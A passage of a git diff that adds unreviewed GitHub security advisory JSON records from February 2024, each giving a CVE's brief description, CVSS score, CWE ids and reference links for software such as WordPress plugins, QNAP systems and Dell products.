"https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json b/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json new file mode 100644 index 0000000000000..6323fd1a4c821 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qv88-9x4p-qm78/GHSA-qv88-9x4p-qm78.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv88-9x4p-qm78", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-24112" + ], + "details": "xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24112" + }, + { + "type": "WEB", + "url": "https://github.com/Exrick/xmall/issues/78" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json b/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json new file mode 100644 index 0000000000000..6591c96acbd89 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qvp9-wwpx-gmjx/GHSA-qvp9-wwpx-gmjx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvp9-wwpx-gmjx", + "modified": "2024-02-03T06:30:24Z", + "published": "2024-02-03T06:30:24Z", + "aliases": [ + "CVE-2024-0909" + ], + "details": "The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0909" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T06:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json b/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json new file mode 100644 index 0000000000000..e4c42a2999a1a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qw52-qmwq-9mjq/GHSA-qw52-qmwq-9mjq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw52-qmwq-9mjq", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0797" + ], + "details": "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0797" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json b/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json new file mode 100644 index 0000000000000..9ef7c5eb3bc7d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qwgv-vj4f-32vw/GHSA-qwgv-vj4f-32vw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwgv-vj4f-32vw", + "modified": "2024-02-06T21:30:27Z", + "published": "2024-02-06T21:30:27Z", + "aliases": [ + "CVE-2024-22515" + ], + "details": "Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22515" + }, + { + "type": "WEB", + "url": "https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json b/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json new file mode 100644 index 0000000000000..84a0f92886bf1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qwqw-5hfm-4vgg/GHSA-qwqw-5hfm-4vgg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwqw-5hfm-4vgg", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24939" + ], + "details": "In JetBrains Rider before 2023.3.3 logging of environment variables containing secret values was possible", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24939" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json b/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json new file mode 100644 index 0000000000000..a9a379d0413fe --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qx7r-whpj-fwx8/GHSA-qx7r-whpj-fwx8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx7r-whpj-fwx8", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-52194" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Takayuki Miyauchi oEmbed Gist allows Stored XSS.This issue affects oEmbed Gist: from n/a through 4.9.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52194" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/oembed-gist/wordpress-oembed-gist-plugin-4-9-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json b/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json new file mode 100644 index 0000000000000..fc221cd5b41e3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qxf6-787j-fc5g/GHSA-qxf6-787j-fc5g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxf6-787j-fc5g", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-47700" + ], + "details": "IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.6 products could allow a remote attacker to spoof a trusted system that would not be correctly validated by the Storwize server. This could lead to a user connecting to a malicious host, believing that it was a trusted system and deceived into accepting spoofed data. IBM X-Force ID: 271016.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47700" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/271016" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114767" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json b/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json new file mode 100644 index 0000000000000..5df8860a28908 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r263-7vjw-g5h2/GHSA-r263-7vjw-g5h2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r263-7vjw-g5h2", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-21764" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the product uses hard-coded credentials, which may allow an attacker to connect to a specific port.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21764" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json new file mode 100644 index 0000000000000..fb8c45fcfb885 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r2c3-2vcp-2qx5/GHSA-r2c3-2vcp-2qx5.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2c3-2vcp-2qx5", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24003" + ], + "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutMaterialCount() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24003" + }, + { + "type": "WEB", + "url": "https://github.com/jishenghua/jshERP/issues/99" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24003.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json b/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json new file mode 100644 index 0000000000000..5ec3ea130978e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r2g2-g732-97cw/GHSA-r2g2-g732-97cw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2g2-g732-97cw", + "modified": "2024-02-08T09:30:41Z", + "published": "2024-02-08T09:30:41Z", + "aliases": [ + "CVE-2024-24034" + ], + "details": "Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, allows remote attackers to execute arbitrary code.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24034" + }, + { + "type": "WEB", + "url": "https://github.com/ELIZEUOPAIN/CVE-2024-24034/tree/main" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T09:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json b/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json new file mode 100644 index 0000000000000..ab2c50fd7d80f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r3mr-jgh6-phpp/GHSA-r3mr-jgh6-phpp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3mr-jgh6-phpp", + "modified": "2024-02-06T09:31:37Z", + "published": "2024-02-06T09:31:37Z", + "aliases": [ + "CVE-2023-25543" + ], + "details": "\nDell Power Manager, versions prior to 3.14, contain an Improper Authorization vulnerability in DPM service. A low privileged malicious user could potentially exploit this vulnerability in order to elevate privileges on the system. \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25543" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000209464/dsa-2023-075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-280" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json b/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json new file mode 100644 index 0000000000000..a04e977b884e5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r3vw-5726-q8gc/GHSA-r3vw-5726-q8gc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3vw-5726-q8gc", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-22107" + ], + "details": "An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method systemSettingsDnsDataAction at /opt/webapp/src/AppBundle/Controller/React/SystemSettingsController.php is vulnerable to command injection via the /old/react/v1/api/system/dns/data endpoint. An authenticated attacker can abuse it to inject an arbitrary command and compromise the platform.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22107" + }, + { + "type": "WEB", + "url": "https://adepts.of0x.cc/gtbcc-pwned/" + }, + { + "type": "WEB", + "url": "https://x-c3ll.github.io/cves.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json b/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json new file mode 100644 index 0000000000000..5054fb192a510 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r4m8-492c-frc5/GHSA-r4m8-492c-frc5.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r4m8-492c-frc5", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41281" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41281" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-53" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77", + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json b/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json new file mode 100644 index 0000000000000..8749aa6bd21c7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r57p-gw8h-38xj/GHSA-r57p-gw8h-38xj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r57p-gw8h-38xj", + "modified": "2024-02-08T06:30:24Z", + "published": "2024-02-08T06:30:24Z", + "aliases": [ + "CVE-2024-24091" + ], + "details": "Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24091" + }, + { + "type": "WEB", + "url": "https://www.yealink.com/en/trust-center/security-advisories/2f2b990211c440cf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T06:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json b/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json new file mode 100644 index 0000000000000..ba694d9383815 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r5m6-pgh6-qg26/GHSA-r5m6-pgh6-qg26.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5m6-pgh6-qg26", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0508" + ], + "details": "The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pricing Table Elementor Widget in all versions up to, and including, 2.10.27 due to insufficient input sanitization and output escaping on the user supplied link URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0508" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1010" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1019" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3021959/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ecc5a17e-c716-48bd-9b4d-49d870ae6bf3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json b/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json new file mode 100644 index 0000000000000..da171f7bb0177 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r6xh-8x5q-w7v7/GHSA-r6xh-8x5q-w7v7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6xh-8x5q-w7v7", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2024-22449" + ], + "details": "\nDell PowerScale OneFS versions 9.0.0.x through 9.6.0.x contains a missing authentication for critical function vulnerability. A low privileged local malicious user could potentially exploit this vulnerability to gain elevated access.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22449" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json b/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json new file mode 100644 index 0000000000000..1938b9c72cda5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r7c8-hj86-5mfc/GHSA-r7c8-hj86-5mfc.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7c8-hj86-5mfc", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6701" + ], + "details": "The Advanced Custom Fields (ACF) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom text field in all versions up to, and including, 6.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6701" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022469/advanced-custom-fields" + }, + { + "type": "WEB", + "url": "https://www.advancedcustomfields.com/blog/acf-6-2-5-security-release/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3593dfd-7b2a-4d01-8af0-725b444dc81b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json b/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json new file mode 100644 index 0000000000000..ae2034abe307e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r889-rc6f-3h5m/GHSA-r889-rc6f-3h5m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r889-rc6f-3h5m", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41274" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to launch a denial-of-service (DoS) attack via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41274" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json b/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json new file mode 100644 index 0000000000000..5b855b99fee74 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r92x-24fv-xvcc/GHSA-r92x-24fv-xvcc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r92x-24fv-xvcc", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51506" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WPCS – WordPress Currency Switcher Professional allows Stored XSS.This issue affects WPCS – WordPress Currency Switcher Professional: from n/a through 1.2.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51506" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/currency-switcher/wordpress-wpcs-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T12:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json 